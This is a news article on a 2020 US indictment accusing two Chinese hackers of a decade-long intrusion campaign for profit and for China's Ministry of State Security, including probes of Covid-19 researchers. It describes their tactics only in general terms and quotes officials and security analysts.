Li Xiaoyu had a problem. At some point in his decade-long hacking spree with former college classmate Dong Jiazhi, as alleged in a recent Justice Department indictment, the Chinese national found himself unable to break into the mail server of a Burmese human rights group. The usual methods apparently hadn’t worked. For Li, the solution came from having a friend in high places: An officer with China’s Ministry of State Security handed him zero-day malware—unknown to security vendors, and so harder to defend against—to help finish off the job.
Other countries have long blurred the lines between criminal and state-sponsored hacking, particularly Russia, Iran, and North Korea. But in a detailed indictment unsealed by the Department of Justice Tuesday, the United States has for the first time officially accused China of belonging to that club. Since at least 2009, authorities say, Li and Dong have hacked hundreds of companies around the world. Their targets range from manufacturing and engineering companies to videogame and education software to solar energy to pharmaceuticals. More recently—and unsurprisingly, given the intense international interest—the pair has targeted firms working on Covid-19 vaccines and treatments. They’ve allegedly stolen invaluable intellectual property to pass along to their MSS handlers, while lining their own pockets along the way.
“China is using cyberintrusions as part of its rob, replicate, and replace strategy to technological development,” said assistant attorney general for national security John Demers at a press conference Tuesday. “China is providing a safe haven for criminal hackers who, as in this case, are hacking in part for their own personal gain, but willing to help the state and on call to do so.”
The indictment outlines at length how Li and Dong allegedly worked as a tag team. Dong would research victims and how they might be exploited; Li did the dirty work of compromising the networks and exfiltrating the data. The pair used the same general workflow regardless of the victim, which makes sense given the volume of attacks to which they have been linked. Efficiency at scale counts for a lot.
First, they would identify high-value targets, and attempt to get a foothold either through poorly configured networks or through fresh vulnerabilities that their targets hadn’t yet patched. On September 11, 2018, for instance, Adobe disclosed a critical bug in its ColdFusion platform; by October 20 of that year, Li had successfully exploited it to install a so-called web shell on the network of a US government biomedical research agency in Maryland.
Web shells were endemic to Li and Dong’s efforts, particularly one called “China Chopper,” a widely available and relatively simple tool that provided the attackers with remote access to targeted networks. The hackers would also run credential-stealing software to grab user names and passwords. Once they had sufficient visibility into a victim’s systems, they would amass the data they wanted to steal into a compressed RAR file.
Court documents outline certain steps the hackers took to hide their activity from there, like working primarily out of the “recycle bin” folder, which Windows hides by default. They would also give their web shells and RAR files innocuous names, such as changing an extension to “.jpg” to make it look like a simple image rather than dozens or even hundreds of gigabytes of intellectual property.
The indictment contains only a fraction of the heists Li and Dong are linked to, but shows an impressive breadth of work. They allegedly stole 200GB from a California firm, including radio, laser, and antennae technology. Another 140GB from a Virginia defense contractor, comprising both details of projects for the US Air Force and the personal information of hundreds of employees and contractors. Over a terabyte of data from a mechanical engineering company at work on high-efficiency gas turbines. Not to mention a hit list that included multiple videogame and pharmaceutical companies, an educational software firm, Covid-19 research, and hundreds of other victims worldwide.
In some cases, it seems unclear whether Li and Dong were acting on their own behalf or that of the Chinese government. In others, the lines are drawn more brightly. They allegedly stole emails between a dissident and former Tiananmen Square protestor and the Dalai Llama’s office, which would have not clear financial value but plenty of intrigue for the Chinese government. At the other extreme, they allegedly sent a email in 2017 to several employees of a Massachusetts software company with the subject line “Source Code To Be Leaked!” and demanded a $15,000 cryptocurrency payoff.
While this is the first time the US has lumped China in with other countries that mingle with cybercriminals, the allegation comes as little surprise to the security community. “The Chinese government has long relied on contractors to conduct cyberintrusions,” says Ben Read, senior manager of analysis at cybersecurity firm FireEye. “Using these freelancers allows the government to access a wider array of talent, while also providing some deniability in conducting these operations.”
Along with other recent high-profile China indictments—including of the country’s elite APT10 group and the four alleged Equifax hackers—the activity outlined Tuesday belies a widely touted “cybertruce” signed between China and the US in 2015. What had once seemed like a few cracks in the dam turns out to be a Grand Coulee-sized hole.
“I think the 2015 agreement was a major accomplishment, and it followed sustained pressure by the Obama administration on the Chinese government regarding malicious cyberactivity including intellectual property theft,” says Lisa Monaco, former homeland security advisor to Obama and currently a partner at law firm O’Melveny & Myers. “But the resurgence in activity by Chinese cyberactors demonstrates that cyberdeterrence must be strategic, coordinated, and sustained. An agreement is only going to be effective if there is a commitment to holding the other party accountable.”
Whatever deterrent effect indictments may have, it hasn’t been enough, given the ongoing enormity of the problem. “The sale and scope of the hacking activities sponsored by [Chinese] intelligence services against the US and our international partners is unlike any other threat we’re facing today,” said FBI deputy director David Bowdich at Tuesday’s press conference. “China steals intellectual property and research which bolsters its economy, and then they use that illicit gain as a weapon to silence any country that would dare challenge their illegal actions. This type of economic coercion is not what we expect from a trusted world leader. It is what we expect from an organized crime syndicate.”
That audacity has taken on even more significance as countries race to find Covid-19 vaccines and treatments. While the indictment stops short of alleging that Li and Dong have successfully stolen related data, it does list multiple attempted intrusions against companies working on the problem as far back as January of this year, in one case probing a California biotech firm for weaknesses literally the day after it announced that it was researching antiviral drugs for Covid-19. The FBI and Department of Homeland Security had already broadly decried China's disruptive Covid-19 hacking in May.
“This indictment shows the extremely high value that all governments, including China, place on COVID-19-related information,” says Read.
That interest, and the broader intellectual property theft, shows no signs of abating. The indictment was filed on July 7; it alleges six discrete instances of reconnaissance by Li, all on the same day, just three weeks earlier. Especially given Covid-19 travel restrictions, it seems unlikely that he or Dong will ever see a US courtroom.
Which in a sense makes it all the more reasonable to air out their alleged deeds now. If the US can't stop China's indiscriminate hacking, it can at least shine a spotlight on it.